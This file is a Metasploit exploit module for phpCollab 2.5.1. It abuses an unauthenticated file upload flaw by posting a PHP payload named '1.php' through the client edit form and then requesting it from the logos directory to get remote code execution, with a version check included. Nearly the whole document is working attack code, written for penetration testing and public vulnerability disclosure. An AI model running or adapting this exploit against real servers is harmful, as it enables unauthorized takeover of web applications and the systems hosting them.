##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'phpCollab 2.5.1 Unauthenticated File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a file upload vulnerability in phpCollab 2.5.1 
        which could be abused to allow unauthenticated users to execute arbitrary code
        under the context of the web server user.

        The exploit has been tested on Ubuntu 16.04.3 64-bit
      },
      'Author'         =>
        [
          'Nicolas SERRA <n.serra[at]sysdream.com>', # Vulnerability discovery 
          'Nick Marcoccio "1oopho1e" <iremembermodems[at]gmail.com>', # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'URL', 'https://www.exploit-db.com/exploits/42934/' ],
        ],
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Payload'        =>
        {
          'DisableNops' => true
        },
      'Targets'        => [ ['Automatic', {}] ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Sep 29 2017'
      ))

      register_options(
        [
          OptString.new('TARGETURI', [ true, "Installed path of phpCollab ", "/phpcollab/"])
        ])
  end

  def check
    url = normalize_uri(target_uri.path, "general/login.php?msg=logout")
    res = send_request_cgi(
        'method'  => 'GET',
        'uri'     =>  url
    )

    if res && res.body.include?('PhpCollab v2.5.1') 
      return Exploit::CheckCode::Appears
    end

    return Exploit::CheckCode::Safe
  end

  def exploit
    filename = '1.php'
    register_file_for_cleanup(filename)

    data = Rex::MIME::Message.new
    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"upload\"; filename=\"#{filename}\"")

    print_status("Uploading backdoor file: #{filename}")

    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path, "clients/editclient.php?id=1&action=update"),
      'ctype'    => "multipart/form-data; boundary=#{data.bound}",
      'data'     => data.to_s
     })

    if res && res.code == 302 
      print_good("Backdoor successfully created.")
    else
      fail_with(Failure::Unknown, "#{peer} - Error on uploading file")
    end

    print_status("Trigging the exploit...")
    send_request_cgi({
      'method'  => 'GET',
      'uri'     => normalize_uri(target_uri.path, "logos_clients/1.php")
     }, 5)
  end
end